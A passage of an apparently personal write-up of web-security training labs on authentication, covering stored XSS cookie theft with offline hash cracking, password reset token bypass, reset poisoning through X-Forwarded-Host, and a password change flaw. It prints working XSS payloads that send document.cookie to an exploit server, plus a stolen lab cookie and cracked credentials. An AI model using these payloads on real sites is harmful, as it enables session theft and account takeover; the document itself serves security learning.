hashList = readWordlistToHashList(wordlist)
writeHashListToFile(hashList, hashFilePath)
finalPayloadList = addingPrefixBase64Encode(hashList)
writeFinalPayloadToFile(finalPayloadList, finalPayloadPath)
```
This lab is broken.
### Lab - 2 Offline Password Cracking
#### Site Map
![圖片](https://hackmd.io/_uploads/Bk--q8kWR.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/HJOp9LkWC.png)
#### Identify
![圖片](https://hackmd.io/_uploads/ry3YsIkW0.png)
**Confirm Defense Mechanisms**
No HttpOnly flag on the cookie
The cookie can be cracked (base64 + hash)
**Bypass**
Testing the comment functionality to find a place to execute JavaScript
We need to do two things
1. Grab the victim's cookie via JavaScript
2. Pass the victim's cookie to our server listener.
![圖片](https://hackmd.io/_uploads/ByFlaLkWC.png)
```html
<svg onload=prompt()>
```
![圖片](https://hackmd.io/_uploads/SyEVTL1Z0.png)
Successful
```html
<svg onload=alert(document.cookie)>
```
![圖片](https://hackmd.io/_uploads/ryxnA8kZR.png)
Stored XSS found!
#### Exploit
Exploit the XSS vulnerability to execute arbitrary JavaScript
Pass the victim's cookie to the exploit server
Payload that works
```
<svg onload=
document.location='//exploit-0a9500bb032c0b9680c634b101d400fc.exploit-server.net/exploit?log='+document.cookie></svg>
```
Works
```
<script>window.location.href = "https://exploit-0a9c0098048473df859011c101d70033.exploit-server.net/exploit?log=" + document.cookie;</script>
```
Works
Victim cookie
```
secret=O9VA9feGEVoEVmm1Lm0R37IwAUMzQhqO;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz
```
Base64 decode (the whole value was decoded, so the `secret=` part comes out as garbage)
```
secret=;Õ@õ÷ZViµ.mß²0C3B;%ÛK-k- y-in=carlos:26323c16d5f4dabff3bb136f2460a943
```
Log in with the victim's cookie ->
```
stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz
```
Doesn't work
Crack the cookie
![圖片](https://hackmd.io/_uploads/rkWzetJ-A.png)
Login
![圖片](https://hackmd.io/_uploads/H1pHA_kWA.png)
```
carlos
onceuponatime
```
![圖片](https://hackmd.io/_uploads/SJ-ngFkWR.png)
![圖片](https://hackmd.io/_uploads/HyUpxFyb0.png)
Solved !
## Password Reset Mechanism
### Sending the password by email
Some websites send the password by mail.
Users have multiple devices that automatically sync their mailbox; we can intercept the mail if it passes over an insecure channel.
### Resetting password via URL
```
http://vulnerable-website.com/reset-password?user=Valid-user
```
The reset page checks whether the token is valid
```
http://vulnerable-website.com/reset-password?token=a0ba0d1cb3b63d13822572fcff1a241895d893f659164d4cc550b421ebdd48a8
```
If the token matches -> redirect to the reset page
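Added example (not the note's code) of a reset flow that addresses both labs below: the link is built from a configured canonical host rather than from Host/X-Forwarded-Host, the token is random, single-use and time-limited, and a missing or empty token is refused instead of being treated as a match. The host, the stores and the TTL are assumptions.

```python
import hashlib
import secrets

CANONICAL_HOST = "https://example.com"   # assumed deployment setting; never read from the request
TOKEN_TTL = 900                           # seconds a reset link stays valid (assumption)
PASSWORDS = {"wiener": "peter", "carlos": "montoya"}   # lab accounts, plain text for the demo only
RESET_TOKENS = {}                         # sha256(token) -> {"user": ..., "expires": ...}


def _key(token):
    # Only a hash of the token is stored, so a leaked table cannot be turned into links.
    return hashlib.sha256(token.encode()).hexdigest()


def request_reset(username, request_headers, now):
    """Issue a token and build the link from the canonical host.

    request_headers is accepted only to make the point: Host and
    X-Forwarded-Host inside it are deliberately never consulted."""
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[_key(token)] = {"user": username, "expires": now + TOKEN_TTL}
    return token, f"{CANONICAL_HOST}/reset-password?token={token}"


def reset_link_vulnerable(request_headers, token):
    """The poisoning flaw: the link host comes from attacker-influenced headers."""
    host = request_headers.get("X-Forwarded-Host") or request_headers.get("Host")
    return f"https://{host}/reset-password?token={token}"


def complete_reset(params, new_password, now):
    """Whose password changes is decided by the token alone.

    A username field in params is ignored, an empty or missing token is
    refused, and the token is consumed on first use."""
    token = params.get("token")
    if not token:
        return None
    record = RESET_TOKENS.pop(_key(token), None)
    if record is None or now > record["expires"]:
        return None
    PASSWORDS[record["user"]] = new_password
    return record["user"]
```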
### LAB 1: Refresh form to bypass the token check
Credentials: wiener:peter
Victim's username: carlos
#### Site Map
![圖片](https://hackmd.io/_uploads/rkmKKFk-R.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/H1ZqYtJWR.png)
#### Identify
**Confirm Defense Mechanisms**
Password reset requires -> a token (received by mail)
**Bypass**
![圖片](https://hackmd.io/_uploads/B1dTiYJbR.png)
#### Exploit
![圖片](https://hackmd.io/_uploads/BkeU4oF1-0.png)
![圖片](https://hackmd.io/_uploads/HybrjYk-R.png)
Solved !
### LAB-2 Password Reset Poisoning via (Proxy, X-Forward-For Injection)
#### Site Map
![圖片](https://hackmd.io/_uploads/BydQ55J-0.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/H1RP9q1Z0.png)
#### Identify
![圖片](https://hackmd.io/_uploads/H1IUgjJZ0.png)
Website -> sits behind a proxy
Attack vector
- X-Forwarded-Host (carries the client-facing domain)
![圖片](https://hackmd.io/_uploads/Hk9TfXpZ0.png)
**Confirm Defense Mechanisms**
Password reset requires a token (email)
**Bypass**
![圖片](https://hackmd.io/_uploads/BkMHko1bA.png)
If the reset-password domain can be manipulated by our header injection, it may let us change the victim's password
#### Exploit
![圖片](https://hackmd.io/_uploads/rktQXs1bA.png)
![圖片](https://hackmd.io/_uploads/S1q8nYeZC.png)
```
bx8yy156n1xo1vl84kgdio2hxz6od0kx
```
![圖片](https://hackmd.io/_uploads/H1_SvikZC.png)
![圖片](https://hackmd.io/_uploads/BJm6Ds1-C.png)
Solved
## User Password Change Mechanism
Flawed design:
Some websites use a hidden user value in the form to identify who wants to change their password.
### LAB-3 Passing Current User Parameter in Password Change
Your credentials: wiener:peter
Victim's username: carlos
#### Site Map
![圖片](https://hackmd.io/_uploads/BkZA8qgZC.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/B1GkPqgWC.png)
#### Identify
**Flawed Design**
The password-change request shouldn't carry a current-user parameter; the user must come from the session
![圖片](https://hackmd.io/_uploads/H1W4vcxW0.png)
![圖片](https://hackmd.io/_uploads/Hk7g65lZC.png)
![圖片](https://hackmd.io/_uploads/Hy7Mp5l-A.png)
**Confirm Defense Mechanisms**
**Bypass**
#### Exploit
![圖片](https://hackmd.io/_uploads/ryh4aqlbR.png)
![圖片](https://hackmd.io/_uploads/rkEOT9ebA.png)
```
carlos
moscow
```
![圖片](https://hackmd.io/_uploads/SkenTqlb0.png)
Solved !
Owner 侯智晟 meowheckerouo@gmail.com